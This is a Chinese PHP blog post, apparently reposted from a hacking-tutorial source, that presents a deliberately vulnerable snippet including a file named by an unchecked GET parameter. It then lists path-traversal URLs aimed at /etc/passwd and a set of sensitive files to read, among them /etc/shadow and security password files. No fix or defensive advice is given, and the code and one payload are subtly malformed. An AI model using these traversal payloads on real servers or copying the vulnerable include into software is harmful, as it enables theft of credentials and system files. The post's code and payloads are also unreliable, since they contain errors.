php 伪造本地文件包含漏洞的代码

yipeiwu_com6年前 (2020-03-06)PHP代码库

代码:

 
<?php 
$page=$_GET['page']; 
include($page.'php'); 
?> 

你可以这样使用
http://www.xxx.com/index.php?page=../etc/passwd
http://www.xxx.com/index.php?page=../../../etc/passwd
http://www.xxx.com/index.php?page=..../../etc/passwd

获取更多数据:
etc/profile
etc/services
/etc/passwd
/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default

来自hackteach

返回列表

上一篇：Python字符转换

下一篇：PHP生成静态页面详解

PHP使用ajax的post方式下载excel文件简单示例

本文实例讲述了PHP使用ajax的post方式下载excel文件。分享给大家供大家参考，具体如下：项目需求，前端发起ajax请求，后端生成excel并下载，同时需要在header头中，...

PHP中substr_count()函数获取子字符串出现次数的方法

本文实例讲述了PHP中substr_count()函数获取子字符串出现次数的方法。分享给大家供大家参考，具体如下： PHP中的substr_count()可用于计算指定字符串中子字符串出...

PHP extract 将数组拆分成多个变量的函数

extract()函数语法： int extract( array $var_array [, int $extract_type = EXTR_OVERWRITE [, string...

ajax+php打造进度条 readyState各状态

用Ajax+php打造进度条，其实很简单。 readyState == 状态(0,1,2,3,4) 0:请求未初始化，还没调用open 1:请求已经建立，但还没有发送，还没调用send...

PHP 遍历文件实现代码

复制代码代码如下: function Files($path) { foreach(scandir($path) as $line) { if($line=='.'||$line=='...

宜配屋

php 伪造本地文件包含漏洞的代码

相关文章

PHP使用ajax的post方式下载excel文件简单示例

PHP中substr_count()函数获取子字符串出现次数的方法

PHP extract 将数组拆分成多个变量的函数

ajax+php打造进度条 readyState各状态

PHP 遍历文件实现代码

© YiPeiWu.com 【宜配屋】粤ICP备17031333号

Powered By Z-BlogPHP. Theme by TOYEAN.

宜配屋

php 伪造本地文件包含漏洞的代码

相关文章

PHP使用ajax的post方式下载excel文件简单示例

PHP中substr_count()函数获取子字符串出现次数的方法

PHP extract 将数组拆分成多个变量的函数

ajax+php打造进度条 readyState各状态

PHP 遍历文件实现代码

© YiPeiWu.com 【宜配屋】 粤ICP备17031333号 var _hmt = _hmt || [];(function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?8aa60ae04b767b2af31903508928acc0"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s);})();

Powered By Z-BlogPHP. Theme by TOYEAN.

© YiPeiWu.com 【宜配屋】粤ICP备17031333号